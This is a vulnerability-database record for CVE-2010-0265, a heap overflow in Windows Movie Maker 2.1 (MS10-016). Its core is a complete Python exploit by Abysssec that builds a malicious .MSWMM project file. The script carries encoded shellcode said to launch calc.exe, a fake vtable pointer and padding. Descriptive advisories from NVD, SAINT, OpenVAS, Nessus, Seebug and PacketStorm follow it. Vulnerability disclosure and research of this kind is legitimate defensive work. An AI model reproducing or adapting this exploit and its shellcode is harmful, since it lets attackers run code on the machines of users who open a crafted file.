Movie Maker - Remote Code Execution MS10-016

{"bulletinFamily": "exploit", "id": "EDB-ID:14886", "cvelist": ["CVE-2010-0265"], "modified": "2010-09-04T00:00:00", "lastseen": "2016-02-01T20:45:27", "edition": 1, "sourceData": "'''\r\n __ __ ____ _ _ ____ \r\n | \\/ |/ __ \\ /\\ | | | | _ \\ \r\n | \\ / | | | | / \\ | | | | |_) |\r\n | |\\/| | | | |/ /\\ \\| | | | _ < Day 4 \r\n | | | | |__| / ____ \\ |__| | |_) |\r\n |_| |_|\\____/_/ \\_\\____/|____/ \r\n\r\n http://www.exploit-db.com/movie-maker-remote-code-execution-ms10-016/\r\n https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14886.zip (Movie-Maker-Remote-Code-Execution-Exploit.zip)\r\n\r\n Title : Movie Maker Remote Code Execution (MS10-016)\r\n Version : moviemk.exe 2.1 (XP SP3)\r\n Analysis : http://www.abysssec.com\r\n Vendor : http://www.microsoft.com\r\n Impact : Ciritical\r\n Contact : shahin [at] abysssec.com , info [at] abysssec.com\r\n Twitter : @abysssec\r\n CVE : CVE-2010-0265\r\n\r\n \r\n'''\r\n\r\n\r\n# Exploit for CVE-2010-0265\r\n# Tested on Windows XP SP3( Movie Maker 2.1 )\r\n \r\n\r\n\r\nimport sys\r\n\r\ndef main():\r\n \r\n try:\r\n\t\tfdR = open('src.mswmm', 'rb+')\r\n\t\tstrTotal = fdR.read()\r\n\t\tstr1 = strTotal[:9976]\r\n\t\tstr2 = strTotal[9980:10104]\r\n\t\tstr3 = strTotal[10108:16496]\r\n\t\tstr4 = strTotal[17620:]\r\n\t\t\r\n\t\tsize_first_new = \"\\x20\\x00\\x00\\x00\" # size of first new()\r\n\t\tsize_second_new = \"\\x11\\x11\\x00\\x00\" \t# size of second new()\r\n\t\t\r\n\t\tp2p = \"\\x71\\xb5\\x06\\x77\" # vtable fake pointer from resource section COMRes -8 to jmp EBX \r\n\t\t\r\n\t\t# shellcode calc.exe\r\n\t\tshellcode = '\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xeb\\x00\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x48\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x44\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x54\\x42\\x32\\x41\\x42\\x32\\x42\\x41\\x30\\x42\\x41\\x58\\x41\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x69\\x6c\\x4b\\x58\\x51\\x54\\x65\\x50\\x57\\x70\\x45\\x50\\x4e\\x6b\\x67\\x35\\x35\\x6c\\x4e\\x6b\\x73\\x4c\\x55\\x55\\x71\\x68\\x67\\x71\\x68\\x6f\\x6c\\x4b\\x52\\x6f\\x46\\x78\\x4e\\x6b\\x51\\x4f\\x71\\x30\\x74\\x41\\x7a\\x4b\\x30\\x49\\x6c\\x4b\\x54\\x74\\x6e\\x6b\\x76\\x61\\x4a\\x4e\\x35\\x61\\x4b\\x70\\x6a\\x39\\x4c\\x6c\\x4d\\x54\\x6b\\x70\\x30\\x74\\x54\\x47\\x6a\\x61\\x6a\\x6a\\x64\\x4d\\x63\\x31\\x79\\x52\\x4a\\x4b\\x69\\x64\\x67\\x4b\\x32\\x74\\x65\\x74\\x66\\x64\\x31\\x65\\x4a\\x45\\x6c\\x4b\\x71\\x4f\\x31\\x34\\x57\\x71\\x48\\x6b\\x52\\x46\\x6e\\x6b\\x64\\x4c\\x52\\x6b\\x4e\\x6b\\x31\\x4f\\x77\\x6c\\x54\\x41\\x68\\x6b\\x4c\\x4b\\x57\\x6c\\x6c\\x4b\\x57\\x71\\x4a\\x4b\\x4e\\x69\\x41\\x4c\\x65\\x74\\x67\\x74\\x4a\\x63\\x75\\x61\\x4f\\x30\\x51\\x74\\x6c\\x4b\\x61\\x50\\x50\\x30\\x4f\\x75\\x4f\\x30\\x32\\x58\\x64\\x4c\\x4c\\x4b\\x71\\x50\\x54\\x4c\\x4c\\x4b\\x70\\x70\\x57\\x6c\\x4e\\x4d\\x6e\\x6b\\x73\\x58\\x35\\x58\\x4a\\x4b\\x36\\x69\\x6c\\x4b\\x4d\\x50\\x4c\\x70\\x67\\x70\\x75\\x50\\x37\\x70\\x4c\\x4b\\x45\\x38\\x35\\x6c\\x41\\x4f\\x57\\x41\\x68\\x76\\x53\\x50\\x30\\x56\\x6e\\x69\\x6b\\x48\\x6f\\x73\\x6f\\x30\\x63\\x4b\\x62\\x70\\x30\\x68\\x58\\x70\\x6f\\x7a\\x57\\x74\\x51\\x4f\\x45\\x38\\x6f\\x68\\x59\\x6e\\x4f\\x7a\\x66\\x6e\\x62\\x77\\x69\\x6f\\x38\\x67\\x73\\x53\\x52\\x41\\x30\\x6c\\x71\\x73\\x64\\x6e\\x35\\x35\\x30\\x78\\x70\\x65\\x45\\x50\\x44'\r\n\t\t\r\n\t\t\t\t\t\r\n\t\tif len(shellcode) > 1120:\r\n\t\t\tprint \"[*] Error : Shellcode length is long\"\r\n\t\t\treturn\r\n\t\tif len(shellcode) <= 1120:\r\n\t\t\tdif = 1120- len(shellcode)\r\n\t\t\twhile dif > 0 :\r\n\t\t\t\tshellcode += '\\x90'\r\n\t\t\t\tdif = dif - 1\r\n\t\t\t\t\r\n\t\tfdW= open('exploit.mswmm', 'wb+')\r\n\t\tfdW.write(str1)\r\n\t\tfdW.write(size_first_new)\r\n\t\tfdW.write(str2)\r\n\t\tfdW.write(size_second_new)\r\n\t\tfdW.write(str3)\r\n\t\tfdW.write(p2p)\r\n\t\tfdW.write('\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90') # padding\t\t\r\n\t\tfdW.write(shellcode)\r\n\t\tfdW.write(str4)\r\n\t\t\r\n\t\t\r\n\t\tfdW.close()\r\n\t\tfdR.close()\r\n\t\tprint '[-] Movie Maker file(.MSWMM) generated'\r\n except IOError:\r\n print '[*] Error : An IO error has occurred'\r\n print '[-] Exiting ...'\r\n sys.exit(-1)\r\n \r\nif __name__ == '__main__':\r\n main()", "published": "2010-09-04T00:00:00", "href": "https://www.exploit-db.com/exploits/14886/", "osvdbidlist": [], "reporter": "Abysssec", "hash": "d80ceba8ab8dd60dba29ca078abf6fe08c03eac00239d14252a7f2b749448a5b", "title": "Movie Maker - Remote Code Execution MS10-016", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "MOAUB #4 - Movie Maker Remote Code Execution (MS10-016). CVE-2010-0265. Remote exploit for windows platform", "references": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/14886/", "viewCount": 1, "enchantments": {"vulnersScore": 6.5}}

{"result": {"cve": [{"id": "CVE-2010-0265", "type": "cve", "title": "CVE-2010-0265", "description": "Buffer overflow in Microsoft Windows Movie Maker 2.1, 2.6, and 6.0, and Microsoft Producer 2003, allows remote attackers to execute arbitrary code via a crafted project (.MSWMM) file, aka \"Movie Maker and Producer Buffer Overflow Vulnerability.\"", "published": "2010-03-10T17:30:01", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0265", "cvelist": ["CVE-2010-0265"], "lastseen": "2016-09-03T13:27:07"}], "saint": [{"id": "SAINT:B6369738F65BDCBE2EB736FB2F2098D4", "type": "saint", "title": "Microsoft Windows Movie Maker IsValidWMToolsStream buffer overflow", "description": "Added: 05/19/2010 \nCVE: [CVE-2010-0265](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0265>) \nBID: [38515](<http://www.securityfocus.com/bid/38515>) \nOSVDB: [62811](<http://www.osvdb.org/62811>) \n\n\n### Background\n\n[Windows Movie Maker](<http://www.microsoft.com/windowsxp/downloads/updates/moviemaker2.mspx>) is software for creating and editing home movies. \n\n### Problem\n\nA buffer overflow vulnerability in the IsValidWMToolsStream function allows command execution when a user opens a specially crafted .MSWMM file. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 10-016](<http://www.microsoft.com/technet/security/bulletin/MS10-016.mspx>). \n\n### References\n\n<http://seclists.org/fulldisclosure/2010/Mar/173> \n\n\n### Limitations\n\nExploit works on Windows Movie Maker 2.1 and requires a user to open the exploit file. \n\n### Platforms\n\nWindows XP \n \n\n", "published": "2010-05-19T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ms_movie_maker_isvalid", "cvelist": ["CVE-2010-0265"], "lastseen": "2016-10-03T15:01:56"}, {"id": "SAINT:78DCBFB71B7236C703750A96712A4BAA", "type": "saint", "title": "Microsoft Windows Movie Maker IsValidWMToolsStream buffer overflow", "description": "Added: 05/19/2010 \nCVE: [CVE-2010-0265](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0265>) \nBID: [38515](<http://www.securityfocus.com/bid/38515>) \nOSVDB: [62811](<http://www.osvdb.org/62811>) \n\n\n### Background\n\n[Windows Movie Maker](<http://www.microsoft.com/windowsxp/downloads/updates/moviemaker2.mspx>) is software for creating and editing home movies. \n\n### Problem\n\nA buffer overflow vulnerability in the IsValidWMToolsStream function allows command execution when a user opens a specially crafted .MSWMM file. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 10-016](<http://www.microsoft.com/technet/security/bulletin/MS10-016.mspx>). \n\n### References\n\n<http://seclists.org/fulldisclosure/2010/Mar/173> \n\n\n### Limitations\n\nExploit works on Windows Movie Maker 2.1 and requires a user to open the exploit file. \n\n### Platforms\n\nWindows XP \n \n\n", "published": "2010-05-19T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ms_movie_maker_isvalid", "cvelist": ["CVE-2010-0265"], "lastseen": "2016-12-14T16:58:05"}, {"id": "SAINT:5DCC9664E943DA26775DAB6A460DB2C1", "type": "saint", "title": "Microsoft Windows Movie Maker IsValidWMToolsStream buffer overflow", "description": "Added: 05/19/2010 \nCVE: [CVE-2010-0265](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0265>) \nBID: [38515](<http://www.securityfocus.com/bid/38515>) \nOSVDB: [62811](<http://www.osvdb.org/62811>) \n\n\n### Background\n\n[Windows Movie Maker](<http://www.microsoft.com/windowsxp/downloads/updates/moviemaker2.mspx>) is software for creating and editing home movies. \n\n### Problem\n\nA buffer overflow vulnerability in the IsValidWMToolsStream function allows command execution when a user opens a specially crafted .MSWMM file. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 10-016](<http://www.microsoft.com/technet/security/bulletin/MS10-016.mspx>). \n\n### References\n\n<http://seclists.org/fulldisclosure/2010/Mar/173> \n\n\n### Limitations\n\nExploit works on Windows Movie Maker 2.1 and requires a user to open the exploit file. \n\n### Platforms\n\nWindows XP \n \n\n", "published": "2010-05-19T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ms_movie_maker_isvalid", "cvelist": ["CVE-2010-0265"], "lastseen": "2017-01-10T14:03:44"}], "openvas": [{"id": "OPENVAS:900232", "type": "openvas", "title": "Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (975561)", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-016.", "published": "2010-03-10T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=900232", "cvelist": ["CVE-2010-0265"], "lastseen": "2017-07-02T21:10:02"}], "nessus": [{"id": "SMB_NT_MS10-016.NASL", "type": "nessus", "title": "MS10-016: Vulnerability in Windows Movie Maker Could Allow Remote Code Execution (975561)", "description": "The remote Windows host contains a version of Windows Movie Maker that is affected by a buffer overflow vulnerability due to the way the application parses project file formats.\n\nIf an attacker can trick a user on the affected system into opening a specially crafted Movie Maker or Producer file using the affected application, this issue could be leveraged to execute arbitrary code subject to the user's privileges.", "published": "2010-03-09T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=45020", "cvelist": ["CVE-2010-0265"], "lastseen": "2017-07-26T23:49:37"}], "seebug": [{"id": "SSV-69768", "type": "seebug", "title": "Movie Maker - Remote Code Execution (MS10-016)", "description": "Summary: \nMovie Maker is the Windows operating system provides a movie editing software, the Producer is a PowerPoint you can install the optional component for creating can be viewed in a browser of the multimedia presentation.< br/>Windows Movie Maker in processing the deformity. MSWMM project file there is a heap overflow vulnerability that could lead to write-access the damage and execute arbitrary code.< br/>the vulnerability is caused by IsValidWMToolsStream()function, the function twice using different sizes of the*pbuffer, in the second use from a MSWMM file to read the data and reuse the pbuffer before it is not re-allocated. If read from a file of size greater than the initial internal value, can lead to stack overflow. Microsoft Producer can also trigger this vulnerability, simply the extension from. MSWMM to change to. MSProducer. \nbr/>\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-69768", "cvelist": ["CVE-2010-0265"], "lastseen": "2016-07-28T22:33:10"}], "packetstorm": [{"id": "PACKETSTORM:93497", "type": "packetstorm", "title": "Month Of Abysssec Undisclosed Bugs - Movie Maker", "description": "", "published": "2010-09-06T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/93497/Month-Of-Abysssec-Undisclosed-Bugs-Movie-Maker.html", "cvelist": ["CVE-2010-0265"], "lastseen": "2016-12-05T22:25:09"}]}}